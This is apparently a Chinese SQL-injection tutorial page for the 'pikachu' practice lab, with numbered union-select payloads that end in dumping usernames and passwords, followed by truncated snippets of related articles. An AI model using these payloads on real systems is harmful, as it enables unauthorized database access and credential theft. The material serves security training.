第一步:抓包
第二步:判斷注入 id=1 and 1=1 正確 id=1 and1=2 報錯
第三步:判斷列數 id=1 order by 3 報錯 order by 2 正確 (依此可以判斷為2列)
第四步:爆顯示位 :id=-1 union select 1,2 (可以爆出1或哪個是顯示位)
第五步:爆資料庫:id=-1 union select 1,database() (在2列上爆資料庫)
第六步:爆資料表:id=-1 union select 1,table_name from information_schema.tables where table_schema=『pikachu』
第七步:爆資料列:id=-1 union select 1,column_name from information_schema.columns where table_name=『users』
第八步:爆使用者名稱密碼字段:id=-1 union select 1,concat(username,0x7e,password) from users
①判斷注入:id=1』 or 1=1 %23 正確 1』 or 1=2 報錯
②判斷列數 :id=1』 order by 3 %23 報錯 1』 order by 2 正確
③爆顯示位 :id=-1』 union select 1,2 %23
④爆資料庫:id=-1』 union select 1,2 %23
⑤爆資料庫:id=-1』union select 1,database()%23
⑥報資料表:id=-1』 union select 1,table_name from information_schema.tables where table_schema=『pikachu』
⑦爆資料列:id=-1』 union select 1,column_name from information_schema.columns where table_name=『users』
⑧爆使用者名稱密碼字段:id=-1』 union select 1,concat(username,0x7e,password) from users %23
SQL注入之常見注入的步驟
update注入 在修改資訊的時候,後台就是通過update去找操作的 insert注入 insert 注入是指我們前端註冊的資訊,後台就是通過 insert這個操作插入到資料庫中 在註冊資訊處抓包 insert判斷注入 單引號報錯 存在注入,報錯資訊為 1234 1 1 1 1 基於報錯資訊進行注...
SQL注入之常見注入的步驟
判斷注入 name kobe and 1 1 23 正常,name kobe and 1 2 報錯 存在注入 通過length判斷資料庫的長度 name kobe and length database 6 23 正常,7報錯 所以長度為7 判斷資料庫第一位的ascii值 name kobe and...
SQL注入基本步驟
這篇文章將的比較好 sql注入基本步驟 1 注入點測試 2 查詢字段數 3 判斷回顯位 4 查詢資料庫的基本資訊 5 爆資料庫名 6 爆資料庫表名 7 爆欄位名 現在來介紹幾個在滲透測試中常用的幾個函式和表庫名。hostname 主機名稱 datadir 返回資料庫的儲存目錄 version com...